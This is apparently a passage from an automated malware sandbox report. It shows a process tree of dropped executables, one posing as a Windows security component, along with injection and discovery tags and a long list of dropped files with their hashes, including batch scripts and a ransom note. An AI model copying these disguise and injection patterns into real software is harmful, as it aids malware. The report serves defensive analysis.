                                                                                                                                                                                          taskeng.exe {B0596C09-F3C0-486E-842F-95003622E877} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:3836
                                                                                                                                                                                          • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                            "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:2332
                                                                                                                                                                                          • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                            "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3832
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Steam.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Steam.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:1384
                                                                                                                                                                                            • C:\ProgramData\fsoieb\oxjuj.exe
                                                                                                                                                                                              C:\ProgramData\fsoieb\oxjuj.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:5164
                                                                                                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x14c
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1464
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:3156
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:336

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\$Recycle.Bin\S-1-5-21-3290804112-2823094203-3137964600-1000\desktop.ini

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              129B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              f357d927cb6dee29800be14f8c3df21e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              89cf219df24dd6edd52ce8e65213b3b14e6e5f32

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              a25820e0815c044cc7a71126408c23f514b1b7cd118621ea8bc3680202733ca7

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              d87d104a81af619d39394af54c49ab7d1aa32ddc23e185b59624fb7527cea080aa276c78a3818525e0f6e0c584350326367f300a36a154771ecbde648fa38748

                                                                                                                                                                                            • C:\IPjaex13M.README.txt

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              334B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              88f6599d557ec2b7a12b3ab4faf3c364

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1bc917d0543deee57c7e13f7ed182c8692e69458

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              781cf1f98ccd2cf18079967e28996a722e75fa28cb2ecc8b638e2efcdf751e8d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              d1633a186dbc849f8c056bd53df4b24f972f170cb4e602b487d89b9762ce78699cf148d70f62272e8e2d13888a73b38910b43c378af8d21102a3fd2e08731d19

                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              55540a230bdab55187a841cfe1aa1545

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              363e4734f757bdeb89868efe94907774a327695e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              230B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              169755fad30417e982f0b24e73d2cf6d

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              87b09b9976abda44dbba9fe5c1989cffc20a3337

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              a3209db126d6541fb5abf9e95f6dbf4444aa20f0bb2e6bd6486ee2340b6b384c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              76e0cca16ab6cbc451855f50a1db660c499c1ad5f76c9e45e533b1d3446ced670a2a9e476b8c34f09ea531df74334832cf68dffa751a1fc6897f06f2de51227f

                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              342B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              82dde02b6fd6ff1ec173f77055dd4aac

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              8af72f396ee567ec12a72fcc3a4ff37a8cb98c75

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              81ac2b05141ecfca2040392c14dcaeeebe86b2ae1cce25c4218dfe687d8acb92

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              39efe041803fde2091d928f7d334bbb9a173c6c3edab2163adbb12e35156d2a4dadadbcbb538facec1b928f632a9da234ddbbc3f4a67f29d84e348c0ba125c1c

                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              342B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              5511d2e3c22fe82b380f6d0b1943567c

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              23136aeba8764b18db8fa9d5b8407980d6f825f6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              bebb52dbf3f0c372de5226b3bb41838df6c45d5e3ffef03b595987df584b9063

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ac10ab8b0ca37639d66dae67dde0eb803cd077b06c27aa117c1f8deff39f21526569525563fe4985911081db45a3fc1f7f64ffcc892addc8f60e0552c9ed84e4

                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              342B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              d86ddd40d332269c9a58b07109573568

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              7809f4620316ac70cf27738315a20081c52c2cdc

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              97197d64d56fee16c102bc56a799ab3926e24a216b888aedeb80827a136a57c6

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              299bc1476bcaeede9e2fd0972126556694e0c3c867f9eb790e06f09f2c679fb0d76b13eb5ac5323594cf3b15ca6f41cb1d94405a74595c2f950b189f9fcc2001

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              16B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              aefd77f47fb84fae5ea194496b44c67a

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              dcfbb6a5b8d05662c4858664f81693bb7f803b82

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              264KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              16B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              18e723571b00fb1694a3bad6c78e4054

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              345KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              dfa0648b6520c4f6ee04f2301538dc78

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              276ca93676704a5e6b4f931e33c190f5cf507a6e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              47bb45b022031b6b351aa43fddf46c70aa877c8c15378b5b17ab818432af90df

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              10bd85e9e185301b67f313fc2f0dc2c5e3fb6cc6dfe88cc1b03fbc1814b98cd05aae7c02137467940e133d0615bfdc1c87ccee76841ca727aad942e2708d1a86

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EB0KZ1Y4\2[1]

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              8KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              39f45edb23427ebf63197ca138ddb282

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              4be1b15912c08f73687c0e4c74af0979c17ff7d5

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              77fbb0d8630024634880c37da59ce57d1b38c7e85bdcc14c697db9e79c24e0de

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              410f6baad25b256daebfa5d8b8a495429c9e26e7de767b2a0e6e4a75e543b77dbd0abca0335fb1f0d91e49e292b42cedc6edd72d25a3c4c62330e2b31c054cc6

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\4[1]

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              2266f0aecd351e1b4092e82b941211ea

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1dced8d943494aa2be39ca28c876f8f736c76ef1

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              cbbad0ab02cd973c9c4e73336e3bcd0849aeb2232a7bdbc38f0b50696b5c28c3

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              6691cd697bbe7f7a03d9de33869aab289d0a1438b4ee194d2047ded957a726b1d3fe93f08e4a0c677018b20e2521aeb021ab1dc4d1a67927604829ddfd9d59aa

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WUBCGJ0A\1[1]

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              65KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              465c683a329b60ec58342aa638fabba8

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a6d5e3e5e609e87a1568ce16887d40afcd7eaba0

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              678df0bb785d289af533ec918d301e82ce53014fabb47a193fc14b8e01b1f615

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              0169482bc5e5721d51ece625651e683eb49647d8777ddfa5568de095cb0dcec614fc53ff3a40bc6cd72f63076823b4f7221c1a09cf781460f93c2c5c5616c6e8

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WUBCGJ0A\3[1]

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              49KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              d66a021c5973288cbddc24f25cbe7ff5

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              19c192afbf1d0205b2ef3b21f1eaf79b2de7bd7d

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              0addd61d01ea1b70f07eafcb6686f3373a320d09440e217f5b3ae9beb479bc46

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              08a5ce796fb4ecbead56f5ca84a3154ef956850a7ef5329e3e5334a954702ef931ed995ac6782c3816210e710770a5a5407df8416182d14cd9f047d0480b6b7a

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\SwiftTech Solutions\SwiftServe.pif

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              872KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c56b5f0201a3b3de53e561fe76912bfd

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1rPwmYAqGxXj.bat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              549c070dce07450ffd4cf58e6c6b8202

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              155f4ed8c33095c4490b2e914229331c7e43ea39

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              bb1b0d1b1fe9ca9c0b736793c2192ef2ecd1a0bafc873da6649a17565b36ce5c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              1a11f441097410777b396338aaa15c6ac39e8a02324bc74be757699789bd6dd227c491a9a19ca8fd2318f66d92358e65e8e1b4b9b3d842bc3498d3aaf219af73

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\259973368.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              49KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              6946486673f91392724e944be9ca9249

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              e74009983ced1fa683cda30b52ae889bc2ca6395

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              885fbe678b117e5e0eace7c64980f6072c31290eb36d0e14953d6a2d12eff9cd

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              e3241f85def0efefd36b3ffb6722ab025e8523082e4cf3e7f35ff86a9a452b5a50454c3b9530dfdad3929f74a6e42bf2a2cf35e404af588f778e0579345b38c9

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2801324600.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              108KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              1fcb78fb6cf9720e9d9494c42142d885

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2Q1ilIknCiI7.bat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              cecc2d27f536d17726c0bf7fa94a25b5

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              803666e142fc13f7c25d5679d7fd104e40df985e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5ecee1d6222d6d9069ae9a4de6daf3da727c5b7b9f8ff68506c5d75fea29cdee

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              a22d30eb37a0ad34157cee2d225d8d78a2821dca8a350a3944c48fcd60e7e46b63a74d2329b6f379a2708e89cc6af1bfd4a2272754adf2d386f8b6309dfa021f

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2dQap6RBdtP9.bat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              29eb9dda3b7a9592034ebb6b20cd847a

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              d2a852a5c0732ee761b7fa7861acbe7717c4d5ac

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              9089590e782bf0458f4b47071093458d7b9b0d08dfbb696a4d376d0d6c1abb72

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              f2921fd18b2bb336e9f84bd499548c4e170ae96705d3db851d8f3b4e5bc158a024adad596d30607ddfdf402c2bd30b87c6fa86d7a9eaf3cf2d7905e3555b7470

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6WYamtX1Jzt8.bat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c3c2819e43478044f2e1f3062c47b7d9

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              3ccca915d17ab9d23dc84899ef49d4985c7660d6

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              17364f2553f1f35868758a9dc95d1cee04356c2b4a019f857c2ec8374dba5986

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              5d9ae193dc46bd77eba53db0d8684813cb23c1b4fafb083ce538879440544122bed7632055e1e6edad1c2efc14d363bf3d45022d1739ce5117cb8ccafd150c4f

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\724598\Thermal.pif

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              872KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              18ce19b57f43ce0a5af149c96aecc685

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9p4A6R13FBvM.bat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              3843207618140ab48410b43940e11f56

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6e00d70a142fb12f2239ac1279cb81aa38accc35

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              999a8a1e4db5ceb984336f3132ebcbe07ac7e13355a7397028f2889470c76e48

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              68083d6881ae85f6f7cba60706ee2bfb48f7f61c44aec2c707a8df6b3d4d9b67a9d636c9b392434cf6dcc9cfd12bedefbeba48f255c41c94ff55246cda51b423

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Cab26B5.tmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              70KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Confirmed.cmd

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              21KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              aa910cf1271e6246b52da805e238d42e

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              1672b2eeb366112457b545b305babeec0c383c40

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f6aeee7fbc6ce536eef6d44e25edf441678d01317d0153dd3bda808c8c0fd25c

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              f012780499c4a0f4bf2a7213976f66ec1769cf611d133f07204c2041b9d6804875b50e37e42feb51073868d5de503e35abbef4682c3191ae0a7b65ff14a64a07

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DDDDDDDDDDDDD

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              145KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              fba7d4c4c18acc8eb82c959b95bdc47a

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              336bfe44861bc5a1fd41d382148b36eaaecd6b8c

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              06178b3022bd6798874e8467b700458c197aa71be7ecd64b1e1f7a1c9c2927db

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              24642d0b3b444308be4dc1daef5cfb7d913e83201917350e9fd977150d5f28b4ac0742a13cc4d1ca90a1e6b3d225dd22e16af995343379ca6decbc814e9a1b50

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DrDn0KciLIhW.bat

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              208B

                                                                                                                                                                                              MD5

                                                                                                                                                                                              5fe7c431ea9cdad31e6704a61439b3ee

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              fa1544e03b01f159c18e11d773f1128fea106cc0

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              1dc695c062dcd202620e4e4bf083b361b8fd4a87b5814a8734c5dea749b613b8

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              220280e5a81731b37eadadf56b904fafa2bc63c5037d1b3b75860063ebec5655a2e883fe335fcd8c62f6e0d6aaf4b266a2e83e0c48728d19fe4468b3b095813e

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.6MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              bf9acb6e48b25a64d9061b86260ca0b6

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              933ee238ef2b9cd33fab812964b63da02283ae40

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              02a8c111fd1bb77b7483dc58225b2a2836b58cdaf9fc903f2f2c88a57066cbc0

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              ac17e6d73922121c1f7c037d1fc30e1367072fdf7d95af344e713274825a03fc90107e024e06fccda21675ee82a2bccad0ae117e55e2b9294d1a0c5056a2031d

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              798KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              90aadf2247149996ae443e2c82af3730

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              050b7eba825412b24e3f02d76d7da5ae97e10502

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\CovidPass.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              72KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              4ff07dff62d31b141d2ff73725935c08

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              a94ed53eedf1eec8244a4fa4840cc01231ce7d84

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              9a4106e091412d9bfe496224044cac352ccc303ac6f84650732eb1bd3a5060cf

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              877bc0361f902b6a8589ffbde7b4af10344564387aec8f0779fdbff4bd0020e3bbe6483c90dc68d4878934b51dc1e1528c3857f1dccc1797f6db0aaafbe05450

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              8.0MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c7cd553e6da67a35d029070a475da837

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              bb7903f5588bb39ac4cae2d96a9d762a55723b0b

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              d123bd0ec22d7ba6449474a717613b2186d812295965044ac432983df364aa91

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              65f9f23611b14e2e07cd61d8e9b825ddab0dc4ac656b8b632446cb214832b043e13342c5b78fcdf981328521c5be4152be8aef3a444732d06c4ccd1dc897021b

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.1MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c51d8312f4b34e3ce7d855ee8db07033

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              043f24892fdc4617a3e4721c68a1c2ae6aebfab4

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              5c25c7ca4bbea73fb55e5a5fa8c81b1ad367629c09fb00662f7316ecce7e3d5f

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              9ce5428627a5783f4c05b49379f91faab777852a910c507906ec6d34579d96fdc0bca924f1165652660d28f1a95326926960fe2f37888aa4b6d62c668cec6243

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              321KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              4bd25a55bcb6aec078ab1d909cfabe64

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              ba68ca4d2601d9c34bf3e897b434e1abc042e254

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              f0c2e045cbe2076d3c85f4637c9f404407239a109c4d493165a6b55067729d60

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              fac63d88926fb64e90f4863e7bbac681b9b25965384b3f2624c33639eead4930a0cd3503b8a24e6aecb815a392729b75459fa59f197048cfb1d89ce41c4c9006

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\c1.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              547KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              2609215bb4372a753e8c5938cf6001fb

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              ef1d238564be30f6080e84170fd2115f93ee9560

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              1490105c73976217f35fe31d65939d1d9711d370c61f3d7d892afbb07eaaec63

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              3892f3e4188250ab0d3508dd9c1825fa6dfab4fc50b4bc858703123e5512071d710fd8431f94912e74eaa4ca29b40c0b1b97805a5432a07fc09c35a87e6b23d2

                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\c2.exe

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              574KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              ada5fef01b62ddcf1bb086c29240390b

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              657c16d838372654ad5e1608944cc8e85df5c2e2

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              eb99203676d28f1339f2b606162d1cf7c9a1ab43b6025eeb45012493d2e76327

                                                                                                                                                                                              SHA512

